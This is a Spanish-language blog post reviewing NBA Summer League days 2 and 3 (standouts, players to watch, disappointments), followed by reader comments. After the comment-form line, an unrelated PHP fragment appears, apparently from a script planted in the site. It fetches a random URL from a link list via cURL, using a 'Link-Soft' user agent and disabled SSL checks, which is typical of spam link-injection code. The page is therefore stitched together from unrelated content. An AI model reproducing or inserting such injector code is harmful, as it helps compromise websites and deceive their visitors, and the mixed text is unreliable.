Summer Leagues: Días 2 y 3

10 de July de 2013 por rumbero

Día 2

Jornada de contrastes en Orlando. Si los partidos de Summer League ya suelen ser unos correcalles de cuidado ayer encima tuvimos poca emoción y tensión competitiva en el Celtics – Pistons (93-63) y el Sixers – Pacers (75-96). Por otro lado, en Miami se recuperaron de los ridículos 59 puntos que metieron en el primer partido y ganaron a los Nets (86 – 93). Finalmente en el que posiblemente haya sido el mejor partido de la SL, los Thunder le ganaron a Orlando con canasta de Jemery Lamb, muy fallón en el tiro durante todo el partido (4/16 FG, 1/9 3P) pero que clavó la que tocaba (97-98).

Vamos con el seguimiento:

DESTACADOS

Miles Plumlee: 16 puntos, 15 rebotes y  4 tapones. Amo y señor de la pintura. Lo comentábamos en la 1ª jornada, sin Pendergraph y desconociendo qué pasará con Hansbrough deberíamos verle mucho más en la rotación interior. Un buen bicho.

Mason Plumlee: Se picó después del partido de su hermano y nos regaló 23 puntos (8/8 FG) y 9 rebotes en media horita. La pintura de los Heat no era la más temible del mundo pero físicamente se le ve muy bien. A ver si Kidd le encuentra hueco en la rotación. 

Solomon Hill: 22 puntos, 9 rebotes, 4 asistencias. Su primer partido paso más desapercibido aunque estuviera muy bien en el tiro, pero ayer se destapó. Casi infalible desde el triple. Justo lo que necesitan estos Pacers de la segunda unidad

Khalif Wyatt: 25 puntos, 3 rebotes, 1 asistencia para el de los Sixers. Algunos conoceréis ya al bueno de Khalif, puro talento anotador pero con poco físico y escasa visión de juego. Ayer estuvo muy enchufado.

Grant Jerret: Nos lo dejamos inconscientemente el primer día pero hoy no. La segunda ronda de los Thunder de este año tiene muy buena mano. 14 puntos, 5 rebotes con un 50% en 3P. En el primero metió 17 con un 4/5 en triples.

Nicholson & Harkless: Ninguna sorpresa que sean los mejores de Orlando. Se nota que están bastante más fogueados que el resto. 19/4/3 para el primero y 14/5/2 para el segundo.

Kelly Olynyk: 13 puntos, 6 rebotes, 3 asistencias, 5 robos, 1 pérdida y 1 tapón en poco más de 20 minutos. Está dejando muy buenas sensaciones y mucho repertorio ofensivo tanto en la pintura como por fuera. Es muy pronto pero ¿acierto de Ainge?  ¿Se están tirando de los pelos en Oklahoma por dejarlo pasar?

Darius “Earvin” Johnson-Odom: 22 puntos en un buen 8/14 FG. El Earvin se lo pusieron sus padres en honor a Magic y ahí lo tenemos, partiéndolo en los Celtics este verano.

Tyshawn Taylor: Otro que nos dejamos en el primer día de Summer League (17 puntos). Ayer hizo 25, 3 rebotes, 3 asistencias, 3 robos y 5 pérdidas. La temporada pasada ya hizo una buena SL. A ver si Kidd le puede enseñar un par de cosas.

A SEGUIR

Dwight Buycks: El base ya hizo un buen primer partido y ayer acabó con 11 puntos y 5 asistencias. Lo está haciendo algo mejor que R. Jackson.  Es FA.

Daniel Orton: 9 puntos, 7 rebotes y 1 tapón en 16 minutos. Ninguna maravilla pero entre lo poco que nos gusta Perkins y sabiendo que ha cundido el pánico en Oklahoma por los 20 minutos que jugó Steven Adams el primer día, no está de más echarle un ojo. Le dio tiempo de dejar medio KO a Reggie Jackson de un cabezazo.

Doron Lamb: Otro buen partido suyo demostrando su tiro y defensa. 16 puntos, 2 rebotes, 1 asistencia, 0 pérdidas en más 30 minutos.

Phil Pressey: 14 puntos, 4 asistencias, 4 pérdidas. Algo más  asentando el de los Celtics. Teóricamente es mejor organizador que anotador pero ayer tuvo buen día de cara al aro.

Tony Mitchell (el de Detroit): 6 puntos, 10 rebotes e intensidad por un tubo. De lo poco salvable ayer en los Pistons

Arnett Moultrie: 15 puntos y 9 rebotes aunque abusando un poco del tiro de media distancia. Igual lo vemos más esta temporada en los nuevos Sixers.

Ian Clark: Que no sea dicho que no ponemos a nadie de Miami. 19 puntos para él mientras que contra Utah consiguió 15. De todas maneras, ayer le superó su compañero Scotty Hopson con 22. Que Lebron y Wade no se duerman…

DECEPCIONES

MCW: 13 puntos, 7 asistencias, 2 rebotes, 2 robos…0 pérdidas! Con estos números no debería estar aquí, pero el 4/19 FG y la sensación de que estuvo muy perdido pesan bastante. Como sabemos que nos leen lo ponemos aquí para que espabile de cara al próximo.

Victor Oladipo: 12 puntos, 3 rebotes, 5 asistencias, 2 robos, 3 pérdidas. 2/12 FG. Se le hizo de noche con la defensa de Jackson antes de que lo dejaran fuera de combate. Como a MCW le ponemos en esta sección porque esperamos más de él.

Kentavious Caldwell-Pope: 11 puntos (3/10 FG, 1/6 3p) 1 rebote, 1 asistencia, 4 robos, 2 pérdidas. Se le ve muy nervioso y negado de cara al aro. El -38 con él en pista tampoco ayuda. Repite en decepciones aunque ha mejorado respecto al primero (tampoco era muy difícil).

Rasheed Wallace: Se estrenaba como asistente de los Pistons y no recibió ninguna técnica por protestar. Esperábamos bastante más de él.

Día 3

Pacers  y Celtics abrieron la tercera jornada con un buen partido que se acabaron llevando los verdes 74-76 pero en el que D. Sloan tuvo en sus manos la victoria con un triple final que no entró. Los Thunder siguen invictos, pero ayer tuvieron que trabajárselo mucho contra los Pistons. Remontaron 14 puntos de desventaja en el último cuarto con una exhibición total de Reggie Jackson (75-79). Otros que siguen invictos a costa de los Jazz son los Rockets, aunque estos descansaron la anterior jornada. Partido cómodo para ellos dominándolo casi en su totalidad (70-85). Para acabar, Miami ganó “contra pronóstico” a Orlando (94-80) gracias sobre todo al acierto en los tiros libres (30/40) y el rebote.

DESTACADOS

Reggie Jackson: 35 puntos, 1 rebote, 1 asistencia,  2 robos, 1 pérdida. La trillada frase “ganó él solito el partido” no puede ser más apropiada. Metió 23 puntos en los últimos 7 minutos de partido. Totalmente imparable.

Kelly Olynyk: 3 partidos, 3 apariciones en la sección de destacados. Ayer 21 puntos, 9 rebotes,  4 asistencias y 1 tapón en media hora. Demostrando otra vez su calidad y buen manejo de balón. Será un blandurrio pero mola.

Victor Oladipo: Le vino bien el palito del otro día. El mejor de Orlando. 22 puntos,  5 rebotes, 2 asistencias, 2 robos y 5 pérdidas en 26 minutos.  Aun así no acaba de convencer el experimento de ponerlo de PG, pero para eso está la SL.

Kentavious Caldwell-Pope: Había ganas de ponerlo en esta sección después de sus dos primeros partidos.  19 puntos, 6 rebotes y 1 robo.  6/13 FG, 4/10 3P. Algo parecido se espera de un tirador como él. Esperamos que se vaya sacudiendo los nervios conforme avanzan los partidos

Peyton Siva: Buen partido de Siva. Bastante más hecho que muchos bases que corren por la SL se marcó 12 puntos, 7 asistencias, 1 rebote, 1 asistencia y 1 pérdida. Tiene que mejorar, pero podría llegar a tener un hueco en estos Pistons .

Solomon Hill: Nos está gustando mucho el rookie de los Pacers. 15 puntos,  4 rebotes, 3 asistencias, 3 robos, y 1 pérdida. Lleva en estos 3 partidos un 58% FG y 66.7 en 3P y no es solo un buen anotador.  ¿La habrá vuelto a clavar Larry? Veremos… pero igual le tiene minutos por delante de Orlando Johnson de cara a la temporada

Dwight Buycks: Es una debilidad personal.  13 puntos, 6 rebotes, 3 asistencias, 4 robos y 0 pérdidas. Otra gran partido, aunque difícilmente va a tener un hueco en estos Thunder.

James Ennis: Otra buena actuación del rookie de Miami: 19 puntos, 6 rebotes

A SEGUIR

Alec Burks: Su partido no fue nada del otro mundo: 18 puntos (5/15 FG), 3 rebotes, 3 asistencias, 1 robo y 4 pérdidas. Pero con la salida de Foye habrá que estar atentos a su nivel de juego porque deberíamos verlo muchos minutos en pista esta temporada.

Steven Adams: Bastante mejor que en el primer partido. 11 puntos y 6 rebotes en media horita. Está verdecito por eso el amigo, seguramente habrá que tener algo de paciencia en Oklahoma.

Romero Osby: Sin ser el del primer día ayer volvió a jugar un buen partido. 11 puntos, 3 rebotes, 2 robos y 3 pérdidas.  Pelea bastante.

Greg Smith: 10 puntos, 7 rebotes, 2 robos, 1 pérdida y 1 tapón en 21 minutos. Si acaba saliendo Asik del equipo deberíamos verlo jugando alguno de los minutos que le dejé Howard. No debería desentonar.

Cedric Jackson: 5 puntos, 8 rebotes y 9 asistencias (mismo número en su anterior partido) para el base de Miami

Colton Iverson & Tony Mitchell (el de Boston) & Phil Pressey: Con estos 3 haremos un pack a ver por dónde van los tiros. Teniendo en  cuenta el equipo que van a tener los verdes esta temporada es probable que los veamos más minutos de la cuenta.  5 puntos, 4 rebotes para el 7 pies, 15/5 para Mitchell y 11/4/5 con 3 robos y 2 pérdidas para el base. A Iverson se le van más maneras que a Fab Melo de largo

DECEPCIONES

Andrew Nicholson: 3 puntos, 2 rebotes, 6 pérdidas en 20 minutos. No tenía muchas ganas de jugar ayer.

Terrence Jones: Es tan jugón que sus 6 puntos (1/7 FG) y 5 rebotes nos saben a poco para el de los Rockets.

Trey Burke: 11 puntos, 2 rebotes, 2 asistencias y 4 pérdidas. Lo intenta pero está lejos de lo que se espera de él. Ayer 1/6 3P, 5/15 FG. A la que se suelte debería empezar a mejorar esos porcentajes porque calidad no le falta.

Comenta

9 comentarios a esta entrada

  1. Denise dice:
    #1

    Gran analisis rumbero

    La verdad es que no me esperaba estos partiditos de Olynik. Vi sus scouting de Draftexpress y me pareció un paquetillo, pero ofensivamente tiene muy buenos fundamentos.

    Y sí, la dececpción está siendo Burke. Ya se habló que junto a McLemore, fue uno de los que peores workouts hizo. No obstante, con la cantidad de minutos (y de la basura muchos de ellos) que va a jugar en Utah creo que hará buenos numeros.

    Yo lo siento por Doron Lamb (Orlando) pero no me gusta. No aporta nada nuevo al juego, hubiese preferido quedarme con Dequan Jones.

      Citar

  2. Sancho88 dice:
    #2

    Denise, no mates a los jugadores por unas ligas de verano. Burke necesita encontrar su lugar en la liga y va a tener todo el espacio del mundo en los Jazz como le pasó a Lillard en los Blazers el año pasado. Ya verás como acaba encantándote

      Citar

  3. Denise dice:
    #3

    Sancho88:
    Denise, no mates a los jugadores por unas ligas de verano. Burke necesita encontrar su lugar en la liga y va a tener todo el espacio del mundo en los Jazz como le pasó a Lillard en los Blazers el año pasado. Ya verás como acaba encantándote

    No lo he matado, de hecho he dicho en la cronica de los Jazz de esta mañana que va a ser rookie del año

      Citar

  4. Esteban dice:
    #4

    Lo de lillard no es lo mismo, este la rompio. Fue mvp de la summer league

    Esta liga sirve en muchos casos

    Reggie jackson por ejemplo y lamb se estan jugando muchisimo

      Citar

  5. Sancho88 dice:
    #5

    Se confirma lo que todos decíamos, que no tenía sentido vagabundear con Sefolosha y Kevin Martin en Playoffs, y que si hubieran confiado en Lamb quizá hubieran llegado a las finales. Otro caso es el de Perry Jones, incomprensible que no juegue en estas ligas de verano, ni se hable de él, que ningún equipo esté interesado… yo no lo entiendo…

      Citar

  6. Simon dice:
    #6

    Para mi le falta muchísima agresividad para jugar a esto Sancho y eso no es algo que se enseñe…

      Citar

  7. Vader dice:
    #7

    ¿Alguien sabe algo de Hardaway JR? ¿Ha debutado con los Knicks?

    Saludos

      Citar

  8. rumbero dice:
    #8

    Denise:
    Yo lo siento por Doron Lamb (Orlando) pero no me gusta. No aporta nada nuevo al juego, hubiese preferido quedarme con Dequan Jones.

    No emociona demasiado no Doron Lamb. Lo puse en el apartado de “a seguir” por la falta de PG que tenéis en Orlando, pero como dices un buen tiro y defensa pero justitio en la dirección de juego. Supongo que de ahí vienen las pruebas con Oladipo en esa posición. Yo no lo acabo de ver, el chaval lo intenta pero no. Es muy bueno, pero no es un base.

      Citar

  9. rumbero dice:
    #9

    Vader:
    ¿Alguien sabe algo de Hardaway JR? ¿Ha debutado con los Knicks?
    Saludos

    Si no voy equivocado los Knicks debutan mañana en Las Vegas contra los Pelicans

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>